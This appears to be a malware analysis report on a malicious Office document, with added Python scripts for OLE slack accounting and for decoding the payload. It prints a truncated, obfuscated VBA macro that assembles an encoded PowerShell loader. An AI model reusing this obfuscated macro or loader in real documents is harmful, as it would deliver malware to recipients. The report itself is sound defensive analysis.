Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 039cf1e1fbca2123…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 66.7 KB (68,290 bytes)
First seen: 2019-04-18
MD5: 46efd35c8e2d43f9c5a38d2ce150a5f8
SHA-1: a3ce01521bcf99d1371249636ea1c2bfe48e5632
SHA-256: 039cf1e1fbca212339895b3dfe75f93305169773b2dfc9ea1f2eb8027af031f7
Risk score: 82

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious OLE document carrying a VBA project. The module is heavily obfuscated: every function is padded with nested For loops of meaningless arithmetic and builds its real output from short string literals that are concatenated in a final "name = a + b + ..." assignment. Joining the literals of vavKf and uzlGj from the preview yields a string that begins "HeLL -e KAAgAG4AZQB3..."; the tail "HeLL -e" is consistent with "powershell -e" (the leading characters are built outside the preview), and the text after "-e" decodes (base64, then UTF-16LE) to "( new-ObjECt  sySTem.io.cOMPrESSION.dEFLAtEsTreAm( [sYSTem.Io.mEmOrystreaM] [COnvErt]::froMbaSe64stRInG('...", that is, an in-memory Deflate decompression of a second, nested base64 stage. The inner stage is cut off by the preview, so whether it downloads a payload or carries one inline is not established from this listing. The AutoOpen marker together with the obfuscated VBA points to a macro-based delivery mechanism of the kind usually spread as a spearphishing attachment.

Heuristics (4)

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 68,290 bytes but its declared streams total only 35,442 bytes; the remaining 32,848 bytes (48%) sit in sectors that no stream accounts for. Unallocated sector slack is a classic hiding place for exploit payloads in older Office documents (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure), but it is also produced by ordinary save cycles, because deleted or rewritten streams leave their old sectors in place. Treat the region as a lead to carve and inspect (high entropy, decodable data, recognisable shellcode), not as proof of an exploit on its own.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains an auto-execution marker such as AutoOpen. The template text of this heuristic says that no modern VBA project was recovered, but for this sample that is contradicted by OLE_VBA_MACROS and by the macros.bas module carved below; read the marker as the probable auto-run entry point of that VBA project rather than as a standalone WordBasic finding. By itself it is evidence of an auto-execute surface, not a downloader or parser-CVE attribution.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code; the decoded module was carved as macros.bas (see Extracted artifacts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that appears in any Office file embedding drawing content; it is not contacted at runtime and is not a network indicator for this sample.
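The arithmetic behind OLE_SLACK_ANOMALY, as an added Python example written for this report (it is not the scanner's own code): it reads the CFB header, FAT and directory, sums the declared sizes of stream entries, counts the sectors the FAT marks as allocated, and reports what the file holds beyond both. To run offline it also constructs its own minimal CFB v3 file (a 4,608-byte WordDocument stream followed by six sectors the FAT marks free, filled with a byte pattern standing in for a hidden payload); that file and its names are constructed for the example. Two simplifications are labelled in the code: only the 109 DIFAT entries in the header are read, which covers files up to about 7 MB, and mini-stream contents are not separately tracked.

```python
"""OLE2/CFB slack accounting. Added example for this report; pure Python,
no olefile dependency. The sample file is constructed, not carved."""
import struct

MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
FREESECT, ENDOFCHAIN, FATSECT, DIFSECT = 0xFFFFFFFF, 0xFFFFFFFE, 0xFFFFFFFD, 0xFFFFFFFC
NOSTREAM = 0xFFFFFFFF
STREAM = 2            # directory entry object type for a stream


def ole_accounting(data):
    """Compare file size with declared stream bytes and FAT-allocated sectors.

    Simplification: only the 109 DIFAT entries in the header are read, which
    covers files with at most 109 FAT sectors (about 7 MB at 512-byte sectors).
    """
    if data[:8] != MAGIC:
        raise ValueError("not an OLE2/CFB file")
    ss = 1 << struct.unpack_from("<H", data, 30)[0]            # sector size
    n_fat, first_dir = struct.unpack_from("<II", data, 44)
    fat = []
    for sid in struct.unpack_from("<109I", data, 76)[:n_fat]:
        fat.extend(struct.unpack_from("<%dI" % (ss // 4), data, ss * (sid + 1)))

    def chain(sid):                       # follow a FAT chain, loop-safe
        seen = set()
        while sid < DIFSECT and sid < len(fat) and sid not in seen:
            seen.add(sid)
            yield sid
            sid = fat[sid]

    declared = 0
    for sid in chain(first_dir):          # directory entries are 128 bytes each
        sector = data[ss * (sid + 1): ss * (sid + 2)]
        for off in range(0, len(sector) - 127, 128):
            if sector[off + 66] == STREAM:
                # v3 files use only the low 32 bits of the 64-bit size field
                declared += struct.unpack_from("<Q", sector, off + 120)[0] & 0xFFFFFFFF
    present = (len(data) - ss) // ss      # sectors physically present after the header
    allocated = sum(1 for sid in range(min(present, len(fat))) if fat[sid] != FREESECT)
    unallocated = len(data) - ss * (1 + allocated)
    return {
        "file_size": len(data),
        "declared_stream_bytes": declared,
        "fat_allocated_bytes": ss * (1 + allocated),
        "unallocated_bytes": unallocated,
        "unallocated_pct": round(100.0 * unallocated / len(data), 1),
    }


def build_sample_ole(stream_len=4608, junk_sectors=6):
    """Constructed minimal CFB v3 file: FAT sector, directory sector, one
    stream, then junk sectors the FAT marks free (the slack the heuristic flags)."""
    ss = 512
    n_data = -(-stream_len // ss)         # ceiling division
    hdr = bytearray(ss)
    hdr[:8] = MAGIC
    struct.pack_into("<HHHHH", hdr, 24, 0x3E, 3, 0xFFFE, 9, 6)   # versions, byte order, shifts
    # num dir sectors, num FAT sectors, first dir sector, txn, mini cutoff,
    # first mini-FAT, num mini-FAT, first DIFAT sector
    struct.pack_into("<8I", hdr, 40, 0, 1, 1, 0, 0x1000, ENDOFCHAIN, 0, ENDOFCHAIN)
    struct.pack_into("<109I", hdr, 76, 0, *([FREESECT] * 108))  # FAT lives in sector 0
    fat = [FREESECT] * (ss // 4)
    fat[0], fat[1] = FATSECT, ENDOFCHAIN                          # FAT sector, directory sector
    for s in range(2, 2 + n_data):
        fat[s] = s + 1
    fat[1 + n_data] = ENDOFCHAIN

    def entry(name, etype, child, start, size):
        e = bytearray(128)
        raw = name.encode("utf-16-le") + b"\x00\x00"
        e[:len(raw)] = raw
        struct.pack_into("<HBBIII", e, 64, len(raw), etype, 1, NOSTREAM, NOSTREAM, child)
        struct.pack_into("<IQ", e, 116, start, size)
        return e

    directory = entry("Root Entry", 5, 1, ENDOFCHAIN, 0) + entry("WordDocument", STREAM, NOSTREAM, 2, stream_len)
    directory += bytes(ss - len(directory))
    body = (b"WORD" * (n_data * ss // 4))[:stream_len].ljust(n_data * ss, b"\x00")
    junk = bytes(range(256)) * (junk_sectors * ss // 256)          # stand-in for a hidden payload
    return bytes(hdr) + struct.pack("<%dI" % len(fat), *fat) + bytes(directory) + body + junk


if __name__ == "__main__":
    for key, value in ole_accounting(build_sample_ole()).items():
        print("%-22s %s" % (key, value))
```

The two views differ on purpose: file size minus declared stream bytes (the report's 48% figure) also counts the header, FAT and directory sectors, while file size minus FAT-allocated bytes isolates sectors that nothing references, which is the region worth carving. Orphaned chains (allocated sectors reachable from no directory entry) show up in the first number but not in the second.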

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4807 bytes
SHA-256: 4ece2b85b5286b1bd737c0d1a212c16e38a19b7019a92e204a2db29a31f8d42d
Preview: first 1,000 lines of the extracted script (listing truncated)
Attribute VB_Name = "bwTLWpOY"
Function vavKf()
On Error Resume Next
For dICLq = OZlvA To WfBBBr
      For NwmFD = PVciUv To 25666
         uhPhSZ = (37697 / CBool(dwdhSi) - fEbUk / Oct(51965 / Hex(24235) / DwUaCm + Rnd(QAmBbw / Fix(37))))
Next
   TiSwiS = 77685 - 52977
Next
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
For YlNwi = bcTiqL To wwQwmh
      For uRCKsk = BowtCb To 53368
         pppMWZ = (20073 / CBool(tIbkjU) - hfGwcH / Oct(66209 / Hex(5890) / tBZnW + Rnd(njHCIb / Fix(37))))
Next
   aKDjj = 18080 - 3537
Next
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
For zIjJP = vdzoH To lSVAWK
      For UrdhL = aFvus To 45133
         Bltss = (59232 / CBool(arGIO) - pVIpD / Oct(25538 / Hex(47682) / jaWbV + Rnd(oJAiG / Fix(37))))
Next
   ilAYc = 14205 - 84073
Next
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
For fdlVS = OFwGr To wUULXR
      For ZSQrX = zTDVj To 24126
         VVZDpB = (16503 / CBool(qjMtr) - SNQoAL / Oct(69497 / Hex(34851) / OmOTVp + Rnd(jNtvJ / Fix(37))))
Next
   vRWWIL = 67732 - 67304
Next
nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE"
For zfbiG = jiALDk To QbhmV
      For zzzwQp = zSiDY To 67118
         Joisq = (67832 / CBool(DitjG) - kAvoVp / Oct(7223 / Hex(67781) / zjKpo + Rnd(NEznUj / Fix(37))))
Next
   cspwm = 14740 - 92735
Next
wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY"
For GMKwh = XqhifS To qwiBu
      For pavvmJ = YCzZDw To 75045
         rWAtGo = (81508 / CBool(PEpQw) - uHusXG / Oct(89380 / Hex(20519) / YnzaV + Rnd(IfjfSz / Fix(37))))
Next
   hInwzM = 61613 - 83594
Next
uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE"
vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm
End Function
Function uzlGj()
On Error Resume Next
For sjnHri = YjqjF To FHNVWH
      For GlfmS = mEbHh To 58906
         buPnN = (99195 / CBool(UKwcSV) - Cjiiq / Oct(46841 / Hex(36368) / HEBoSs + Rnd(zZICj / Fix(37))))
Next
   LrZHW = 58467 - 7175
Next
LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A"
For mDTzTk = sdrGG To mLmYhl
      For MZTQp = qoIWT To 88374
         uVBhr = (96941 / CBool(iEwQv) - PYjnj / Oct(79641 / Hex(86781) / jMjDHO + Rnd(jjGYMr / Fix(37))))
Next
   RKFjjd = 61468 - 15080
Next
FGEmBMVtciC = "HEARgBMAGMAQwBx" + "AEsAUgBYAEQANA" + "BBAGoAcQBkA" + "DAAeQB" + "vADYARQBTAFIATg" + "A3" + "ADkAYgBVA" + "E4ASwB"
For DUPqRI = mdAZK To RdkkN
      For VpsjiY = ViCGP To 18308
         jjjrYc = (52931 / CBool(TuLRf) - sbwwQ / Oct(64410 / Hex(74198) / KkhRKm + Rnd(jXlQjZ / Fix(37))))
Next
   usLkWH = 41035 - 95485
Next
azKSOZ = "uA" + "EoAWABkAHQAdAA3" + "AEwA" + "KwBiAF" + "QAaQBmADQA" + "SgB" + "TAFQA" + "MwBuAEgA"
For QswdH = Hwcov To zKGRp
      For kXZBwj = jDnfK To 60337
         NMRZM = (17717 / CBool(dQnoui) - vhFTh / Oct(62618 / Hex(71602) / wOvOWa + Rnd(USRJc / Fix(37))))
Next
   mtjFf = 89095 - 13185
Next
PlXQwhjw = "TQ" + "BQAGUAWQBMAHoAe" + "AA" + "2AHAAVwA1" + "AEoAUgBvAHEASAB" + "zA" + "G0AeQBVAEUA" + "ZwBzAFYA" + "eQBuAHAAb"
For mNBFq = WhMcwh To NCdzmG
      For vUWlCI = oZOCm To 58424
         LBuJj = (78536 / CBool(mGoKuV) - rCHto / Oct(62017 / Hex(21657) / qQDhc + Rnd(IwaMDT / Fix(37))))
Next
   AjoGR = 88527 - 16943
Next
jzqMjuLPU = "wBpAEMAMQA" + "xAFQAZgBYA" + "C8AKwBYADQA" + "bwBWAEQASwBPA" + "GcA" + "SQBrAEwANQBBAGM" + "AcQA0AGsAY"
uzlGj = LrqUMSv + FGEmBMVtciC + azKSOZ + PlXQwhjw + jzqMjuLPU
End Function
Function SjuitMHdW()
On Error Resume Next
For haHnj = WGIzwI To KdGwLz
      For IOwrCW = SSmXmC To 9514
         pvutk = (72107 / CBool(ROFKJp) - iIFud / Oct(10396 / Hex(37584) / QkNGDo + Rnd(aLFnB / Fix(37))))
Next
   KDSOtQ = 93707 - 68097
Next
pBivWLvjZ = "QBJAHk" + "AQwBzAFIAcwBVAD" + "gAY" + "wBnADcAdwB3"
For rMAMki = rYzpN To JfdhDv
      For tFVnSY = mjkoW To 86783
         tAFrDs = (17
... (truncated)
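The string assembly described in the summary, worked through in code. This is an added Python example written for this report; it is not part of the sample, of oletools, or of the analysis platform. It parses the two string-building functions from the macros.bas preview above (embedded as an abridged copy with most of the junk loops removed), rebuilds each function's return value from its own final concatenation line, joins the results, and decodes the base64/UTF-16LE argument after -e the way PowerShell's -EncodedCommand does. Assumptions: the caller that orders the function results is not in the preview, so they are joined in definition order; and because the preview ends mid-string the base64 is cut to whole quanta before decoding.

```python
"""Rebuild and decode the command the obfuscated VBA assembles.

Added example for this report; not part of the sample, oletools or the
analysis platform. VBA_SAMPLE is an abridged copy of the macros.bas preview
(the two string-building functions, most junk loops removed).
"""
import base64
import re

VBA_SAMPLE = r'''
Attribute VB_Name = "bwTLWpOY"
Function vavKf()
On Error Resume Next
For dICLq = OZlvA To WfBBBr
   TiSwiS = 77685 - 52977
Next
UActTXViAj = "HeLL -e KAAgA" + "G4AZ" + "QB3AC0ATwBiAG" + "oARQ" + "BDAHQAIAAgAHMAe"
UwYrkJRk = "QBTAFQA" + "ZQBtAC4AaQBv" + "AC4AYwBPA" + "E0AUABy" + "AEUA" + "UwBTAEkATwBOA" + "C4AZABFAEYAT" + "AB"
zFFtsvok = "BAHQARQBz" + "AFQAcgBlAE" + "EAbQAoA" + "CA"
nbcQzZujuK = "AWwBz" + "AFkAUwBUAGUA" + "bQAuAEkAbwAuAG" + "0A" + "RQBt" + "AE"
wmojz = "8AcgB5AHM" + "AdAByAGUAYQ" + "BNAF0AIABbAEMA" + "TwBuAHY"
uzuNScm = "ARQByAHQAXQ" + "A6" + "ADoAZgB" + "yAG" + "8ATQ" + "BiAGE"
vavKf = UActTXViAj + UwYrkJRk + zFFtsvok + nbcQzZujuK + wmojz + uzuNScm
End Function
Function uzlGj()
On Error Resume Next
LrqUMSv = "AUwBlADY" + "ANABzAHQAUgBJAG" + "4A" + "RwAoACcAVgB" + "aAEI" + "AdAB" + "TADgATQB3AEY" + "ASQBY" + "AC8AUwBqADQA" + "VQB1A"
FGEmBMVtciC = "HEARgBMAGMAQwBx" + "AEsAUgBYAEQANA" + "BBAGoAcQBkA" + "DAAeQB" + "vADYARQBTAFIATg" + "A3" + "ADkAYgBVA" + "E4ASwB"
azKSOZ = "uA" + "EoAWABkAHQAdAA3" + "AEwA" + "KwBiAF" + "QAaQBmADQA" + "SgB" + "TAFQA" + "MwBuAEgA"
PlXQwhjw = "TQ" + "BQAGUAWQBMAHoAe" + "AA" + "2AHAAVwA1" + "AEoAUgBvAHEASAB" + "zA" + "G0AeQBVAEUA" + "ZwBzAFYA" + "eQBuAHAAb"
jzqMjuLPU = "wBpAEMAMQA" + "xAFQAZgBYA" + "C8AKwBYADQA" + "bwBWAEQASwBPA" + "GcA" + "SQBrAEwANQBBAGM" + "AcQA0AGsAY"
uzlGj = LrqUMSv + FGEmBMVtciC + azKSOZ + PlXQwhjw + jzqMjuLPU
End Function
'''

FUNC_RE = re.compile(r"^Function\s+(\w+)\s*\(\)\s*$(.*?)^End Function\s*$", re.M | re.S)
STR_ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(".*)$', re.M)   # right-hand side is a chain of literals
LITERAL_RE = re.compile(r'"([^"]*)"')


def resolve_functions(src):
    """Map each Function name to the string it returns.

    Only assignments whose right-hand side starts with a string literal are
    collected, so the arithmetic junk loops never match. The return value is
    rebuilt from the `name = a + b + ...` line, so the ordering comes from the
    sample itself rather than from where the assignments sit.
    """
    results = {}
    for name, body in FUNC_RE.findall(src):
        literals = {var: "".join(LITERAL_RE.findall(rhs)) for var, rhs in STR_ASSIGN_RE.findall(body)}
        ret = re.search(r"^\s*%s\s*=\s*(.+?)\s*$" % re.escape(name), body, re.M)
        if ret:
            results[name] = "".join(literals.get(part.strip(), "") for part in ret.group(1).split("+"))
    return results


def build_command(src):
    """Join the function results. Assumption: the caller that orders them is
    outside the preview, so they are joined in definition order."""
    return "".join(resolve_functions(src).values())


def decode_encoded_command(cmd):
    """Decode the `-e <base64>` argument the way PowerShell does: base64, then
    UTF-16LE. The preview stops mid-string, so the blob is cut to whole base64
    quanta and whole UTF-16 code units before decoding."""
    match = re.search(r"-e\s+([A-Za-z0-9+/]+)", cmd)
    if not match:
        raise ValueError("no -e <base64> argument found")
    b64 = match.group(1)
    raw = base64.b64decode(b64[: len(b64) - len(b64) % 4])
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


if __name__ == "__main__":
    command = build_command(VBA_SAMPLE)
    print(command[:48] + "...")
    print(decode_encoded_command(command))
```

The decoded text stops inside the nested base64 literal passed to froMbaSe64stRInG; that literal is the Deflate-compressed next stage, and the preview does not contain enough of it to inflate. The same approach extends to the remaining functions of the module once the full macros.bas is in hand: add their text to the input and the final concatenation lines give the order.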